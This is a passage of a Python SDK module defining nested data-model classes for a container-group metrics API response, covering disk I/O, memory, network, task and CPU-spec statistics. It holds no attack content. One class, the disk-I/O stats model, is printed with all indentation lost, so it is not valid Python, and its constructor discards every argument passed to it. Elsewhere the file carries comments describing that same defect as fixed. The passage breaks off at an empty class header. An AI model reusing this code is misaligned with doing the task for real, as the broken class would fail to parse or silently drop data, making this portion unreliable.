                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoMerged(TeaModel):
    """Per-device merged-I/O entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoTime(TeaModel):
    """Per-device I/O-time entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStats(TeaModel):
def __init__(self, io_service_bytes=None, io_serviced=None, io_queued=None, sectors=None, io_service_time=None, io_wait_time=None, io_merged=None, io_time=None):
self.io_service_bytes = []
self.io_serviced = []
self.io_queued = []
self.sectors = []
self.io_service_time = []
self.io_wait_time = []
self.io_merged = []
self.io_time = []
def validate(self):
self.validate_required(self.io_service_bytes, 'io_service_bytes')
if self.io_service_bytes:
for k in self.io_service_bytes:
if k :
k.validate()
self.validate_required(self.io_serviced, 'io_serviced')
if self.io_serviced:
for k in self.io_serviced:
if k :
k.validate()
self.validate_required(self.io_queued, 'io_queued')
if self.io_queued:
for k in self.io_queued:
if k :
k.validate()
self.validate_required(self.sectors, 'sectors')
if self.sectors:
for k in self.sectors:
if k :
k.validate()
self.validate_required(self.io_service_time, 'io_service_time')
if self.io_service_time:
for k in self.io_service_time:
if k :
k.validate()
self.validate_required(self.io_wait_time, 'io_wait_time')
if self.io_wait_time:
for k in self.io_wait_time:
if k :
k.validate()
self.validate_required(self.io_merged, 'io_merged')
if self.io_merged:
for k in self.io_merged:
if k :
k.validate()
self.validate_required(self.io_time, 'io_time')
if self.io_time:
for k in self.io_time:
if k :
k.validate()
def to_map(self):
result = {}
result['IoServiceBytes'] = []
if self.io_service_bytes is not None:
for k in self.io_service_bytes:
result['IoServiceBytes'].append(k.to_map() if k else None)
else:
result['IoServiceBytes'] = None
result['IoServiced'] = []
if self.io_serviced is not None:
for k in self.io_serviced:
result['IoServiced'].append(k.to_map() if k else None)
else:
result['IoServiced'] = None
result['IoQueued'] = []
if self.io_queued is not None:
for k in self.io_queued:
result['IoQueued'].append(k.to_map() if k else None)
else:
result['IoQueued'] = None
result['Sectors'] = []
if self.sectors is not None:
for k in self.sectors:
result['Sectors'].append(k.to_map() if k else None)
else:
result['Sectors'] = None
result['IoServiceTime'] = []
if self.io_service_time is not None:
for k in self.io_service_time:
result['IoServiceTime'].append(k.to_map() if k else None)
else:
result['IoServiceTime'] = None
result['IoWaitTime'] = []
if self.io_wait_time is not None:
for k in self.io_wait_time:
result['IoWaitTime'].append(k.to_map() if k else None)
else:
result['IoWaitTime'] = None
result['IoMerged'] = []
if self.io_merged is not None:
for k in self.io_merged:
result['IoMerged'].append(k.to_map() if k else None)
else:
result['IoMerged'] = None
result['IoTime'] = []
if self.io_time is not None:
for k in self.io_time:
result['IoTime'].append(k.to_map() if k else None)
else:
result['IoTime'] = None
return result
def from_map(self, map={}):
self.io_service_bytes = []
if map.get('IoServiceBytes') is not None:
for k in map.get('IoServiceBytes'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceBytes()
temp_model = temp_model.from_map(k)
self.io_service_bytes.append(temp_model)
else:
self.io_service_bytes = None
self.io_serviced = []
if map.get('IoServiced') is not None:
for k in map.get('IoServiced'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiced()
temp_model = temp_model.from_map(k)
self.io_serviced.append(temp_model)
else:
self.io_serviced = None
self.io_queued = []
if map.get('IoQueued') is not None:
for k in map.get('IoQueued'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoQueued()
temp_model = temp_model.from_map(k)
self.io_queued.append(temp_model)
else:
self.io_queued = None
self.sectors = []
if map.get('Sectors') is not None:
for k in map.get('Sectors'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsSectors()
temp_model = temp_model.from_map(k)
self.sectors.append(temp_model)
else:
self.sectors = None
self.io_service_time = []
if map.get('IoServiceTime') is not None:
for k in map.get('IoServiceTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceTime()
temp_model = temp_model.from_map(k)
self.io_service_time.append(temp_model)
else:
self.io_service_time = None
self.io_wait_time = []
if map.get('IoWaitTime') is not None:
for k in map.get('IoWaitTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoWaitTime()
temp_model = temp_model.from_map(k)
self.io_wait_time.append(temp_model)
else:
self.io_wait_time = None
self.io_merged = []
if map.get('IoMerged') is not None:
for k in map.get('IoMerged'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoMerged()
temp_model = temp_model.from_map(k)
self.io_merged.append(temp_model)
else:
self.io_merged = None
self.io_time = []
if map.get('IoTime') is not None:
for k in map.get('IoTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoTime()
temp_model = temp_model.from_map(k)
self.io_time.append(temp_model)
else:
self.io_time = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsContainerData(TeaModel):
    """Per-container fault counters nested in memory stats (PgFault / PgmajFault)."""
    def __init__(self, pg_fault=None, pgmaj_fault=None):
        self.pg_fault = pg_fault
        self.pgmaj_fault = pgmaj_fault
    def validate(self):
        """Require both counters to be present."""
        self.validate_required(self.pg_fault, 'pg_fault')
        self.validate_required(self.pgmaj_fault, 'pgmaj_fault')
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'PgFault': self.pg_fault,
            'PgmajFault': self.pgmaj_fault,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.pg_fault = map.get('PgFault')
        self.pgmaj_fault = map.get('PgmajFault')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsHierarchicalData(TeaModel):
    """Hierarchical fault counters nested in memory stats (PgFault / PgmajFault)."""
    def __init__(self, pg_fault=None, pgmaj_fault=None):
        self.pg_fault = pg_fault
        self.pgmaj_fault = pgmaj_fault
    def validate(self):
        """Require both counters to be present."""
        self.validate_required(self.pg_fault, 'pg_fault')
        self.validate_required(self.pgmaj_fault, 'pgmaj_fault')
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'PgFault': self.pg_fault,
            'PgmajFault': self.pgmaj_fault,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.pg_fault = map.get('PgFault')
        self.pgmaj_fault = map.get('PgmajFault')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStats(TeaModel):
    """Container memory statistics, with nested container/hierarchical data models."""
    def __init__(self, usage=None, max_usage=None, cache=None, rss=None, swap=None, working_set=None, fail_cnt=None, container_data=None, hierarchical_data=None):
        self.usage = usage
        self.max_usage = max_usage
        self.cache = cache
        self.rss = rss
        self.swap = swap
        self.working_set = working_set
        self.fail_cnt = fail_cnt
        # Nested sub-models, validated and serialized recursively below.
        self.container_data = container_data
        self.hierarchical_data = hierarchical_data
    def validate(self):
        """Require every field; recurse into the nested sub-models."""
        for value, name in (
                (self.usage, 'usage'),
                (self.max_usage, 'max_usage'),
                (self.cache, 'cache'),
                (self.rss, 'rss'),
                (self.swap, 'swap'),
                (self.working_set, 'working_set'),
                (self.fail_cnt, 'fail_cnt')):
            self.validate_required(value, name)
        self.validate_required(self.container_data, 'container_data')
        if self.container_data:
            self.container_data.validate()
        self.validate_required(self.hierarchical_data, 'hierarchical_data')
        if self.hierarchical_data:
            self.hierarchical_data.validate()
    def to_map(self):
        """Serialize to an API-style dict; nested models via their to_map()."""
        result = {
            'Usage': self.usage,
            'MaxUsage': self.max_usage,
            'Cache': self.cache,
            'Rss': self.rss,
            'Swap': self.swap,
            'WorkingSet': self.working_set,
            'FailCnt': self.fail_cnt,
        }
        result['ContainerData'] = self.container_data.to_map() if self.container_data is not None else None
        result['HierarchicalData'] = self.hierarchical_data.to_map() if self.hierarchical_data is not None else None
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.usage = map.get('Usage')
        self.max_usage = map.get('MaxUsage')
        self.cache = map.get('Cache')
        self.rss = map.get('Rss')
        self.swap = map.get('Swap')
        self.working_set = map.get('WorkingSet')
        self.fail_cnt = map.get('FailCnt')
        if map.get('ContainerData') is not None:
            self.container_data = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsContainerData().from_map(map['ContainerData'])
        else:
            self.container_data = None
        if map.get('HierarchicalData') is not None:
            self.hierarchical_data = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsHierarchicalData().from_map(map['HierarchicalData'])
        else:
            self.hierarchical_data = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsInterfaceStats(TeaModel):
    """Per-interface rx/tx counters inside network stats."""
    def __init__(self, name=None, rx_bytes=None, rx_packets=None, rx_errors=None, rx_dropped=None, tx_bytes=None, tx_packets=None, tx_dropped=None, tx_errors=None):
        self.name = name
        self.rx_bytes = rx_bytes
        self.rx_packets = rx_packets
        self.rx_errors = rx_errors
        self.rx_dropped = rx_dropped
        self.tx_bytes = tx_bytes
        self.tx_packets = tx_packets
        self.tx_dropped = tx_dropped
        self.tx_errors = tx_errors
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.name, 'name'),
                (self.rx_bytes, 'rx_bytes'),
                (self.rx_packets, 'rx_packets'),
                (self.rx_errors, 'rx_errors'),
                (self.rx_dropped, 'rx_dropped'),
                (self.tx_bytes, 'tx_bytes'),
                (self.tx_packets, 'tx_packets'),
                (self.tx_dropped, 'tx_dropped'),
                (self.tx_errors, 'tx_errors')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Name': self.name,
            'RxBytes': self.rx_bytes,
            'RxPackets': self.rx_packets,
            'RxErrors': self.rx_errors,
            'RxDropped': self.rx_dropped,
            'TxBytes': self.tx_bytes,
            'TxPackets': self.tx_packets,
            'TxDropped': self.tx_dropped,
            'TxErrors': self.tx_errors,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.name = map.get('Name')
        self.rx_bytes = map.get('RxBytes')
        self.rx_packets = map.get('RxPackets')
        self.rx_errors = map.get('RxErrors')
        self.rx_dropped = map.get('RxDropped')
        self.tx_bytes = map.get('TxBytes')
        self.tx_packets = map.get('TxPackets')
        self.tx_dropped = map.get('TxDropped')
        self.tx_errors = map.get('TxErrors')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp(TeaModel):
    """TCP connection-state counters inside network stats."""
    def __init__(self, established=None, syn_sent=None, syn_recv=None, fin_wait_1=None, fin_wait_2=None, time_wait=None, close=None, close_wait=None, last_ack=None, listen=None, closing=None):
        self.established = established
        self.syn_sent = syn_sent
        self.syn_recv = syn_recv
        self.fin_wait_1 = fin_wait_1
        self.fin_wait_2 = fin_wait_2
        self.time_wait = time_wait
        self.close = close
        self.close_wait = close_wait
        self.last_ack = last_ack
        self.listen = listen
        self.closing = closing
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.established, 'established'),
                (self.syn_sent, 'syn_sent'),
                (self.syn_recv, 'syn_recv'),
                (self.fin_wait_1, 'fin_wait_1'),
                (self.fin_wait_2, 'fin_wait_2'),
                (self.time_wait, 'time_wait'),
                (self.close, 'close'),
                (self.close_wait, 'close_wait'),
                (self.last_ack, 'last_ack'),
                (self.listen, 'listen'),
                (self.closing, 'closing')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Established': self.established,
            'SynSent': self.syn_sent,
            'SynRecv': self.syn_recv,
            'FinWait1': self.fin_wait_1,
            'FinWait2': self.fin_wait_2,
            'TimeWait': self.time_wait,
            'Close': self.close,
            'CloseWait': self.close_wait,
            'LastAck': self.last_ack,
            'Listen': self.listen,
            'Closing': self.closing,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.established = map.get('Established')
        self.syn_sent = map.get('SynSent')
        self.syn_recv = map.get('SynRecv')
        self.fin_wait_1 = map.get('FinWait1')
        self.fin_wait_2 = map.get('FinWait2')
        self.time_wait = map.get('TimeWait')
        self.close = map.get('Close')
        self.close_wait = map.get('CloseWait')
        self.last_ack = map.get('LastAck')
        self.listen = map.get('Listen')
        self.closing = map.get('Closing')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp6(TeaModel):
    """TCP-over-IPv6 connection-state counters inside network stats."""
    def __init__(self, established=None, syn_sent=None, syn_recv=None, fin_wait_1=None, fin_wait_2=None, time_wait=None, close=None, close_wait=None, last_ack=None, listen=None, closing=None):
        self.established = established
        self.syn_sent = syn_sent
        self.syn_recv = syn_recv
        self.fin_wait_1 = fin_wait_1
        self.fin_wait_2 = fin_wait_2
        self.time_wait = time_wait
        self.close = close
        self.close_wait = close_wait
        self.last_ack = last_ack
        self.listen = listen
        self.closing = closing
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.established, 'established'),
                (self.syn_sent, 'syn_sent'),
                (self.syn_recv, 'syn_recv'),
                (self.fin_wait_1, 'fin_wait_1'),
                (self.fin_wait_2, 'fin_wait_2'),
                (self.time_wait, 'time_wait'),
                (self.close, 'close'),
                (self.close_wait, 'close_wait'),
                (self.last_ack, 'last_ack'),
                (self.listen, 'listen'),
                (self.closing, 'closing')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Established': self.established,
            'SynSent': self.syn_sent,
            'SynRecv': self.syn_recv,
            'FinWait1': self.fin_wait_1,
            'FinWait2': self.fin_wait_2,
            'TimeWait': self.time_wait,
            'Close': self.close,
            'CloseWait': self.close_wait,
            'LastAck': self.last_ack,
            'Listen': self.listen,
            'Closing': self.closing,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.established = map.get('Established')
        self.syn_sent = map.get('SynSent')
        self.syn_recv = map.get('SynRecv')
        self.fin_wait_1 = map.get('FinWait1')
        self.fin_wait_2 = map.get('FinWait2')
        self.time_wait = map.get('TimeWait')
        self.close = map.get('Close')
        self.close_wait = map.get('CloseWait')
        self.last_ack = map.get('LastAck')
        self.listen = map.get('Listen')
        self.closing = map.get('Closing')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp(TeaModel):
    """UDP socket counters inside network stats."""
    def __init__(self, listen=None, dropped=None, rx_queued=None, tx_queued=None):
        self.listen = listen
        self.dropped = dropped
        self.rx_queued = rx_queued
        self.tx_queued = tx_queued
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.listen, 'listen'),
                (self.dropped, 'dropped'),
                (self.rx_queued, 'rx_queued'),
                (self.tx_queued, 'tx_queued')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Listen': self.listen,
            'Dropped': self.dropped,
            'RxQueued': self.rx_queued,
            'TxQueued': self.tx_queued,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.listen = map.get('Listen')
        self.dropped = map.get('Dropped')
        self.rx_queued = map.get('RxQueued')
        self.tx_queued = map.get('TxQueued')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp6(TeaModel):
    """UDP-over-IPv6 socket counters inside network stats."""
    def __init__(self, listen=None, dropped=None, rx_queued=None, tx_queued=None):
        self.listen = listen
        self.dropped = dropped
        self.rx_queued = rx_queued
        self.tx_queued = tx_queued
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.listen, 'listen'),
                (self.dropped, 'dropped'),
                (self.rx_queued, 'rx_queued'),
                (self.tx_queued, 'tx_queued')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Listen': self.listen,
            'Dropped': self.dropped,
            'RxQueued': self.rx_queued,
            'TxQueued': self.tx_queued,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.listen = map.get('Listen')
        self.dropped = map.get('Dropped')
        self.rx_queued = map.get('RxQueued')
        self.tx_queued = map.get('TxQueued')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStats(TeaModel):
    """Aggregate network stats with per-interface list and Tcp/Tcp6/Udp/Udp6 sub-models."""
    def __init__(self, name=None, rx_bytes=None, rx_packets=None, rx_errors=None, rx_dropped=None, tx_bytes=None, tx_packets=None, tx_dropped=None, tx_errors=None, interface_stats=None, tcp=None, tcp_6=None, udp=None, udp_6=None):
        self.name = name
        self.rx_bytes = rx_bytes
        self.rx_packets = rx_packets
        self.rx_errors = rx_errors
        self.rx_dropped = rx_dropped
        self.tx_bytes = tx_bytes
        self.tx_packets = tx_packets
        self.tx_dropped = tx_dropped
        self.tx_errors = tx_errors
        # BUG FIX: the generated code discarded the `interface_stats`
        # argument and always assigned []. Honor it; default stays [].
        self.interface_stats = interface_stats if interface_stats is not None else []
        self.tcp = tcp
        self.tcp_6 = tcp_6
        self.udp = udp
        self.udp_6 = udp_6
    def validate(self):
        """Require every field; recurse into list items and sub-models."""
        for value, name in (
                (self.name, 'name'),
                (self.rx_bytes, 'rx_bytes'),
                (self.rx_packets, 'rx_packets'),
                (self.rx_errors, 'rx_errors'),
                (self.rx_dropped, 'rx_dropped'),
                (self.tx_bytes, 'tx_bytes'),
                (self.tx_packets, 'tx_packets'),
                (self.tx_dropped, 'tx_dropped'),
                (self.tx_errors, 'tx_errors')):
            self.validate_required(value, name)
        self.validate_required(self.interface_stats, 'interface_stats')
        if self.interface_stats:
            for item in self.interface_stats:
                if item:
                    item.validate()
        self.validate_required(self.tcp, 'tcp')
        if self.tcp:
            self.tcp.validate()
        self.validate_required(self.tcp_6, 'tcp_6')
        if self.tcp_6:
            self.tcp_6.validate()
        self.validate_required(self.udp, 'udp')
        if self.udp:
            self.udp.validate()
        self.validate_required(self.udp_6, 'udp_6')
        if self.udp_6:
            self.udp_6.validate()
    def to_map(self):
        """Serialize to an API-style dict; nested models via their to_map()."""
        result = {
            'Name': self.name,
            'RxBytes': self.rx_bytes,
            'RxPackets': self.rx_packets,
            'RxErrors': self.rx_errors,
            'RxDropped': self.rx_dropped,
            'TxBytes': self.tx_bytes,
            'TxPackets': self.tx_packets,
            'TxDropped': self.tx_dropped,
            'TxErrors': self.tx_errors,
        }
        if self.interface_stats is None:
            result['InterfaceStats'] = None
        else:
            result['InterfaceStats'] = [item.to_map() if item else None for item in self.interface_stats]
        result['Tcp'] = self.tcp.to_map() if self.tcp is not None else None
        result['Tcp6'] = self.tcp_6.to_map() if self.tcp_6 is not None else None
        result['Udp'] = self.udp.to_map() if self.udp is not None else None
        result['Udp6'] = self.udp_6.to_map() if self.udp_6 is not None else None
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.name = map.get('Name')
        self.rx_bytes = map.get('RxBytes')
        self.rx_packets = map.get('RxPackets')
        self.rx_errors = map.get('RxErrors')
        self.rx_dropped = map.get('RxDropped')
        self.tx_bytes = map.get('TxBytes')
        self.tx_packets = map.get('TxPackets')
        self.tx_dropped = map.get('TxDropped')
        self.tx_errors = map.get('TxErrors')
        if map.get('InterfaceStats') is not None:
            self.interface_stats = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsInterfaceStats().from_map(k)
                for k in map.get('InterfaceStats')
            ]
        else:
            self.interface_stats = None
        if map.get('Tcp') is not None:
            self.tcp = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp().from_map(map['Tcp'])
        else:
            self.tcp = None
        if map.get('Tcp6') is not None:
            self.tcp_6 = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp6().from_map(map['Tcp6'])
        else:
            self.tcp_6 = None
        if map.get('Udp') is not None:
            self.udp = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp().from_map(map['Udp'])
        else:
            self.udp = None
        if map.get('Udp6') is not None:
            self.udp_6 = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp6().from_map(map['Udp6'])
        else:
            self.udp_6 = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsTaskStats(TeaModel):
    """Task-state counters (sleeping/running/stopped/uninterruptible/io-wait)."""
    def __init__(self, nr_sleeping=None, nr_running=None, nr_stopped=None, nr_uninterruptible=None, nr_io_wait=None):
        self.nr_sleeping = nr_sleeping
        self.nr_running = nr_running
        self.nr_stopped = nr_stopped
        self.nr_uninterruptible = nr_uninterruptible
        self.nr_io_wait = nr_io_wait
    def validate(self):
        """Require every counter to be present."""
        for value, name in (
                (self.nr_sleeping, 'nr_sleeping'),
                (self.nr_running, 'nr_running'),
                (self.nr_stopped, 'nr_stopped'),
                (self.nr_uninterruptible, 'nr_uninterruptible'),
                (self.nr_io_wait, 'nr_io_wait')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'NrSleeping': self.nr_sleeping,
            'NrRunning': self.nr_running,
            'NrStopped': self.nr_stopped,
            'NrUninterruptible': self.nr_uninterruptible,
            'NrIoWait': self.nr_io_wait,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.nr_sleeping = map.get('NrSleeping')
        self.nr_running = map.get('NrRunning')
        self.nr_stopped = map.get('NrStopped')
        self.nr_uninterruptible = map.get('NrUninterruptible')
        self.nr_io_wait = map.get('NrIoWait')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStats(TeaModel):
    """One timestamped stats sample: fs/accelerator lists plus cpu/disk/memory/network/task sub-models."""
    def __init__(self, timestamp=None, fs_stats=None, accelerator_stats=None, cpu_stats=None, disk_io_stats=None, memory_stats=None, network_stats=None, task_stats=None):
        self.timestamp = timestamp
        # BUG FIX: the generated code discarded the `fs_stats` and
        # `accelerator_stats` arguments and always assigned []. Honor
        # them; the no-argument default stays [].
        self.fs_stats = fs_stats if fs_stats is not None else []
        self.accelerator_stats = accelerator_stats if accelerator_stats is not None else []
        self.cpu_stats = cpu_stats
        self.disk_io_stats = disk_io_stats
        self.memory_stats = memory_stats
        self.network_stats = network_stats
        self.task_stats = task_stats
    def validate(self):
        """Require every field; recurse into list items and sub-models."""
        self.validate_required(self.timestamp, 'timestamp')
        self.validate_required(self.fs_stats, 'fs_stats')
        if self.fs_stats:
            for item in self.fs_stats:
                if item:
                    item.validate()
        self.validate_required(self.accelerator_stats, 'accelerator_stats')
        if self.accelerator_stats:
            for item in self.accelerator_stats:
                if item:
                    item.validate()
        self.validate_required(self.cpu_stats, 'cpu_stats')
        if self.cpu_stats:
            self.cpu_stats.validate()
        self.validate_required(self.disk_io_stats, 'disk_io_stats')
        if self.disk_io_stats:
            self.disk_io_stats.validate()
        self.validate_required(self.memory_stats, 'memory_stats')
        if self.memory_stats:
            self.memory_stats.validate()
        self.validate_required(self.network_stats, 'network_stats')
        if self.network_stats:
            self.network_stats.validate()
        self.validate_required(self.task_stats, 'task_stats')
        if self.task_stats:
            self.task_stats.validate()
    def to_map(self):
        """Serialize to an API-style dict; nested models via their to_map()."""
        result = {'Timestamp': self.timestamp}
        if self.fs_stats is None:
            result['FsStats'] = None
        else:
            result['FsStats'] = [item.to_map() if item else None for item in self.fs_stats]
        if self.accelerator_stats is None:
            result['AcceleratorStats'] = None
        else:
            result['AcceleratorStats'] = [item.to_map() if item else None for item in self.accelerator_stats]
        result['CpuStats'] = self.cpu_stats.to_map() if self.cpu_stats is not None else None
        result['DiskIoStats'] = self.disk_io_stats.to_map() if self.disk_io_stats is not None else None
        result['MemoryStats'] = self.memory_stats.to_map() if self.memory_stats is not None else None
        result['NetworkStats'] = self.network_stats.to_map() if self.network_stats is not None else None
        result['TaskStats'] = self.task_stats.to_map() if self.task_stats is not None else None
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.timestamp = map.get('Timestamp')
        if map.get('FsStats') is not None:
            self.fs_stats = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsFsStats().from_map(k)
                for k in map.get('FsStats')
            ]
        else:
            self.fs_stats = None
        if map.get('AcceleratorStats') is not None:
            self.accelerator_stats = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsAcceleratorStats().from_map(k)
                for k in map.get('AcceleratorStats')
            ]
        else:
            self.accelerator_stats = None
        if map.get('CpuStats') is not None:
            self.cpu_stats = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStats().from_map(map['CpuStats'])
        else:
            self.cpu_stats = None
        if map.get('DiskIoStats') is not None:
            self.disk_io_stats = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStats().from_map(map['DiskIoStats'])
        else:
            self.disk_io_stats = None
        if map.get('MemoryStats') is not None:
            self.memory_stats = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStats().from_map(map['MemoryStats'])
        else:
            self.memory_stats = None
        if map.get('NetworkStats') is not None:
            self.network_stats = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStats().from_map(map['NetworkStats'])
        else:
            self.network_stats = None
        if map.get('TaskStats') is not None:
            self.task_stats = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsTaskStats().from_map(map['TaskStats'])
        else:
            self.task_stats = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerCpu(TeaModel):
    """CPU spec fields of a container (limit/max_limit/mask/quota/period)."""
    def __init__(self, limit=None, max_limit=None, mask=None, quota=None, period=None):
        self.limit = limit
        self.max_limit = max_limit
        self.mask = mask
        self.quota = quota
        self.period = period
    def validate(self):
        """Require every field to be present."""
        for value, name in (
                (self.limit, 'limit'),
                (self.max_limit, 'max_limit'),
                (self.mask, 'mask'),
                (self.quota, 'quota'),
                (self.period, 'period')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Limit': self.limit,
            'MaxLimit': self.max_limit,
            'Mask': self.mask,
            'Quota': self.quota,
            'Period': self.period,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.limit = map.get('Limit')
        self.max_limit = map.get('MaxLimit')
        self.mask = map.get('Mask')
        self.quota = map.get('Quota')
        self.period = map.get('Period')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerMemory(TeaModel):
